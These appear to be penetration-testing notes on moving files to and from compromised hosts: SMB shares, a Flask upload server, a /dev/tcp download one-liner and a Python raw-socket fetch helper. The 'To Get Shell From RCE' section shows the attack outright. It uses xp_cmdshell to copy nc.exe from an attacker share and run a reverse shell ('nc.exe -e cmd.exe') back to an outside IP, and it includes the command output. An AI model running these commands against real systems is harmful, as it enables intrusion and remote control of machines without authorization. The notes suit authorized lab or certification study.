
File transfer

SMB

# on Kali (Server)
$ sudo impacket-smbserver test .

# on Windows (Client)
Navigated to \\kali-machine-ip\test using Windows Explorer

# OR 
C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe

To Get Shell From RCE

In a different case, I only had access to a MySQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:

1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
        output

        The command completed successfully.
        NULL
        NULL
(return status = 0)

1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
        output

                1 file(s) copied.
                NULL
(return status = 0)

1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go

Python Flask

filetransfer.py

from flask import Flask, request
from werkzeug.utils import secure_filename

app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
    # curl -F "file=@name" sends the file in the multipart field "file"
    if 'file' not in request.files:
        return 'No file part'
    file = request.files['file']
    if file.filename == '':
        return 'No selected file'
    # the filename is client-controlled: strip directory components so an
    # upload cannot be written outside the working directory
    name = secure_filename(file.filename)
    if not name:
        return 'Invalid filename'
    file.save(name)
    return 'File uploaded successfully'

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8081)

Server:

python filetransfer.py

Client:

$ cmd /c curl -F "file=@<file_name>" http://10.10.128.XXX:8081/upload 

Here is a bash one-liner to transfer a file over HTTP using bash's built-in /dev/tcp, for hosts without curl or wget. The raw response starts with the status line and headers, so they are stripped (everything up to the first empty line) before the body is written to the file; this assumes a plain response without chunked transfer encoding:

bash -c "exec 3<>/dev/tcp/IP/80; echo -e 'GET /yourfile.sh HTTP/1.1\r\nHost: IP\r\nConnection: close\r\n\r\n' >&3; sed '1,/^\r\$/d' <&3 > yourfile.sh"

When working in containers, you’re operating in a highly stripped-down environment. Typically, you won’t have access to common offensive security tools, or even to basic utilities like nc, wget, or curl.
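The /dev/tcp one-liner above pulls the whole HTTP response, status line and headers included, off the socket, so the framing has to be removed before the body is usable. As an added example (not from the original notes), here is the same raw-socket GET in Python with the response framing handled properly for both Content-Length and chunked responses; host, port and paths are placeholders, and the sample responses are constructed, not captured traffic.

```python
import hashlib
import socket

def http_body(raw: bytes) -> bytes:
    """Body of a raw HTTP/1.1 response (Content-Length or chunked framing)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: no end of headers")
    lines = head.split(b"\r\n")
    if lines[0].split(b" ")[1:2] != [b"200"]:
        raise ValueError(f"unexpected status line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if headers.get(b"transfer-encoding") == b"chunked":
        body = b""
        while True:
            size_line, _, rest = rest.partition(b"\r\n")
            size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
            if size == 0:
                return body
            body += rest[:size]
            rest = rest[size + 2:]  # skip the chunk data and its trailing CRLF
    if b"content-length" in headers:
        length = int(headers[b"content-length"])
        if len(rest) < length:
            raise ValueError("truncated body")
        return rest[:length]
    return rest  # Connection: close, body runs until the server closes

def fetch_file(host: str, port: int, path: str, out_path: str) -> str:
    """Raw-socket GET like the /dev/tcp one-liner; saves only the body and returns its SHA-256."""
    req = f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    chunks = []
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(req.encode())
        while data := s.recv(65536):
            chunks.append(data)
    body = http_body(b"".join(chunks))
    with open(out_path, "wb") as f:
        f.write(body)
    return hashlib.sha256(body).hexdigest()

# Constructed sample responses: one payload, framed with Content-Length and chunked.
PAYLOAD = b"#!/bin/sh\nid\n"
SAMPLE_PLAIN = b"HTTP/1.1 200 OK\r\nContent-Length: 13\r\nConnection: close\r\n\r\n" + PAYLOAD
SAMPLE_CHUNKED = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\na\r\n#!/bin/sh\n\r\n3\r\nid\n\r\n0\r\n\r\n"
```

Compare the returned SHA-256 with the hash of the file on the serving host to confirm the transfer was complete and unmodified.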